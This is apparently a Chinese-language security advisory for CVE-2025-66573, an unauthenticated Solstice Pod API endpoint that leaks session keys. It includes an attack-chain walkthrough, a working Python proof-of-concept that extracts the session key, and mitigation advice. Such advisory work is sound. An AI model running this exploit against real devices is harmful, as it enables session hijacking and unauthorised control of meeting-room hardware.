CVE-2025-66573: Solstice Pod API会话密钥泄露漏洞

漏洞信息

漏洞编号

CVE-2025-66573

漏洞类型

敏感信息泄露

CVSS评分

7.5 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Solstice Pod API

漏洞概述

Solstice Pod API（版本5.5和6.2）存在一个严重的安全漏洞。该漏洞源于一个未认证的API端点（/api/config），该端点直接暴露系统敏感信息，包括会话密钥（session key）、服务器版本、产品详细信息和显示名称等。攻击者无需任何身份认证即可访问此端点并提取实时的会话信息。由于会话密钥可用于后续的认证和会话劫持攻击，此漏洞可能导致严重的未授权访问风险。攻击者可以利用获取的会话密钥进一步控制Solstice Pod设备，访问共享内容，甚至可能横向移动到其他系统。此漏洞的CVSS评分为7.5，属于高危漏洞，主要影响机密性。

技术细节

漏洞存在于Solstice Pod API的/api/config端点实现中。该端点在设计时未实施任何身份验证机制，允许任何网络可达的用户直接访问。当请求该端点时，服务器会返回包含敏感配置信息的JSON响应，其中包括：1) session key（会话密钥），用于标识和验证活跃会话；2) server version（服务器版本），泄露系统版本信息；3) product details（产品详情），包含设备特定信息；4) display name（显示名称），设备标识信息。攻击者通过发送简单的HTTP GET请求到目标设备的/api/config路径即可获取这些信息。由于该端点不需要任何认证参数（PR:N），且可通过网络直接访问（AV:N），任何能够与目标设备网络通信的攻击者都可以利用此漏洞。获取的会话密钥可能被用于后续的API调用，实现对设备的未授权控制。

攻击链分析

STEP 1

步骤1: 信息收集

攻击者识别目标网络中的Solstice Pod设备，可以通过扫描开放端口（通常HTTP端口80/443）或通过发现协议识别设备

STEP 2

步骤2: 漏洞探测

攻击者向目标设备的/api/config端点发送HTTP GET请求，验证未认证访问是否可行

STEP 3

步骤3: 敏感信息提取

成功访问后，服务器返回包含会话密钥、服务器版本、产品详情和显示名称的JSON响应

STEP 4

步骤4: 会话劫持/未授权操作

攻击者使用获取的会话密钥，通过其他API端点执行未授权操作，如获取共享内容、控制设备设置等

STEP 5

步骤5: 横向移动（潜在）

如果获取的管理员会话密钥足够权限，攻击者可能横向移动到其他连接的设备或系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
"""
CVE-2025-66573 PoC - Solstice Pod API Session Key Extraction
This PoC demonstrates the unauthenticated access to /api/config endpoint
that exposes sensitive session information including session keys.
"""

import requests
import json
import sys

def exploit_cve_2025_66573(target_url):
    """
    Extract sensitive information from Solstice Pod API /api/config endpoint
    without authentication.
    
    Args:
        target_url: Base URL of the Solstice Pod device (e.g., http://192.168.1.100)
    
    Returns:
        dict: Extracted configuration data including session key
    """
    # Target the vulnerable /api/config endpoint
    config_endpoint = f"{target_url.rstrip('/')}/api/config"
    
    print(f"[*] Targeting: {config_endpoint}")
    print(f"[*] CVE-2025-66573: Solstice Pod API Session Key Extraction")
    print("-" * 60)
    
    try:
        # Send GET request without authentication
        response = requests.get(config_endpoint, timeout=10)
        
        if response.status_code == 200:
            print("[+] Request successful - endpoint is accessible")
            print(f"[+] Status Code: {response.status_code}")
            
            # Parse JSON response
            try:
                config_data = response.json()
                print("\n[+] Extracted Sensitive Information:")
                print("-" * 60)
                
                # Display key information
                if 'sessionKey' in config_data:
                    print(f"[+] Session Key: {config_data['sessionKey']}")
                
                if 'version' in config_data:
                    print(f"[+] Server Version: {config_data['version']}")
                
                if 'displayName' in config_data:
                    print(f"[+] Display Name: {config_data['displayName']}")
                
                # Print full response for analysis
                print("\n[+] Full Response:")
                print(json.dumps(config_data, indent=2))
                
                return config_data
                
            except json.JSONDecodeError:
                print("[!] Response is not valid JSON")
                print(f"Response: {response.text}")
                return None
                
        elif response.status_code == 401:
            print("[-] Endpoint requires authentication (patched)")
            return None
            
        elif response.status_code == 404:
            print("[-] Endpoint not found - target may not be vulnerable")
            return None
            
        else:
            print(f"[-] Unexpected status code: {response.status_code}")
            return None
            
    except requests.exceptions.RequestException as e:
        print(f"[!] Request failed: {e}")
        return None

def main():
    if len(sys.argv) != 2:
        print(f"Usage: {sys.argv[0]} <target_url>")
        print(f"Example: {sys.argv[0]} http://192.168.1.100")
        sys.exit(1)
    
    target = sys.argv[1]
    result = exploit_cve_2025_66573(target)
    
    if result:
        print("\n[!] Vulnerability confirmed - sensitive data exposed")
    else:
        print("\n[-] Exploitation failed or target not vulnerable")

if __name__ == "__main__":
    main()

影响范围

Solstice Pod API < 5.5

Solstice Pod API 5.5

Solstice Pod API 6.2

防御指南

临时缓解措施

在官方补丁发布前，建议采取以下临时缓解措施：1) 通过网络访问控制列表（ACL）限制对Solstice Pod设备的访问，仅允许受信任的管理网络访问；2) 实施Web应用防火墙（WAF）规则，监控和阻止对/api/config端点的异常访问；3) 禁用不必要的API端点或通过反向代理添加认证层；4) 监控网络流量，及时发现和响应异常访问模式；5) 考虑使用VPN或零信任网络访问（ZTNA）方案，确保只有授权用户可以访问设备管理接口。